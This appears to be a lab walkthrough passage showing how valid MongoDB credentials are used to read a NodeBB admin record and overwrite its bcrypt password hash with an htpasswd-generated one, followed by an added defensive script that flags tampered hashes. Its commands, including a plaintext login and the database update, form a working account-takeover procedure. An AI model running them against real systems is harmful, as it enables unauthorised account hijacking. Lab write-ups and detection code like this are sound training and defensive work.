# Authenticated MongoDB

With valid credentials we can overwrite databases and change passwords and configuration for other services in the environment. This could mean generating a new htpasswd-style password hash for WebDAV or NodeBB.

```
┌──(kali㉿kali)-[~]
└─$ mongo mongodb://admin:monkey13@192.168.120.186:27017/
MongoDB shell version v4.2.13
connecting to: mongodb://192.168.120.186:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("42164b37-99dd-429d-91fc-65cc46e0240a") }
MongoDB server version: 4.0.22
...
---

> show databases
admin   0.000GB
config  0.000GB
local   0.000GB
nodebb  0.000GB
>
```

```
> use nodebb
switched to db nodebb
> db.objects.find({ _key: /^user:1$/ })
{ "_id" : ObjectId("6017626e253f4a61ea72a355"), "_key" : "user:1", "email" : "admin@tico.offsec", "joindate" : 1612145262550, "lastonline" : 1612146689780, "status" : "online", "uid" : 1, "username" : "admin", "userslug" : "admin", "password" : "$2a$12$T3BIimnZgfw60c12wFA99.MbugSdE0hfl/SSCYFZJ7jTVHe5PGGB6", "groupTitle" : "[\"administrators\"]", "topiccount" : 1, "postcount" : 1, "lastposttime" : 1612145263314 }
```

We see a single record in the collection, which belongs to the default admin user. We need to generate a new salted password hash to replace the `password` field in the record. We can do that with the `htpasswd` utility by generating a new *bcrypt* hash of the password `password`.

```
┌──(kali㉿kali)-[~]
└─$ htpasswd -bnBC 12 "" password            
:$2y$12$6.8Es6W3Cyc0en31K4inBef3mCoJaDo2lJ6biXdUmKXfrsSqlfgsW
```

Before using it, however, we first need to strip off the leading `:`.

```
┌──(kali㉿kali)-[~]
└─$ htpasswd -bnBC 12 "" password | tr -d ':'
$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu
```

Next, we'll overwrite the target password field with our newly generated hash.

```
> db.objects.update({ _key: /^user:1$/ }, { $set: { password: "$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu" }})
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })
> exit
bye

┌──(kali㉿kali)-[~]
└─$
```
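From the defender's side, the overwrite above leaves an artifact: the original record carries a `$2a$` bcrypt hash, while the `htpasswd` output is `$2y$`. The following added example (not part of the original page) audits exported user records for that mismatch and for hashes that differ from a trusted snapshot. The function name, the baseline map, the `user:2` record and the expected `$2a$`/cost 12 profile (taken from the original record shown above) are assumptions.

```javascript
// Added example: flag user records whose password hash was probably not
// written by the application. Assumption: application hashes look like the
// original record on this page ($2a$ variant, cost 12).
const BCRYPT_RE = /^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{53})$/;

function auditPasswordHashes(docs, baseline, expected = { variant: "2a", cost: 12 }) {
  const findings = [];
  for (const doc of docs) {
    // Only "user:<uid>" records carry a password field.
    if (!/^user:\d+$/.test(doc._key) || typeof doc.password !== "string") continue;
    const reasons = [];
    const m = BCRYPT_RE.exec(doc.password);
    if (!m) {
      reasons.push("not a well-formed bcrypt hash");
    } else {
      if (m[1] !== expected.variant) reasons.push(`variant $${m[1]}$ (expected $${expected.variant}$)`);
      if (Number(m[2]) !== expected.cost) reasons.push(`cost ${Number(m[2])} (expected ${expected.cost})`);
    }
    // Hypothetical baseline: _key -> hash captured from a trusted backup.
    const known = baseline[doc._key];
    if (known !== undefined && known !== doc.password) reasons.push("hash differs from baseline");
    if (reasons.length) findings.push({ key: doc._key, username: doc.username, reasons });
  }
  return findings;
}

// Constructed sample input. user:1 uses the two hashes shown on this page;
// user:2 and its hash are made-up placeholders.
const PLACEHOLDER_HASH = "$2a$12$" + "x".repeat(53);
const BASELINE = {
  "user:1": "$2a$12$T3BIimnZgfw60c12wFA99.MbugSdE0hfl/SSCYFZJ7jTVHe5PGGB6",
  "user:2": PLACEHOLDER_HASH,
};
const SAMPLE_DOCS = [
  { _key: "user:1", username: "admin",
    password: "$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu" },
  { _key: "user:2", username: "editor", password: PLACEHOLDER_HASH },
  { _key: "global", userCount: 2 }, // non-user record, skipped
];

console.log(JSON.stringify(auditPasswordHashes(SAMPLE_DOCS, BASELINE), null, 2));
```

Run it against a periodic export of the `objects` collection; a hit on either check is a reason to review who wrote to the database.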

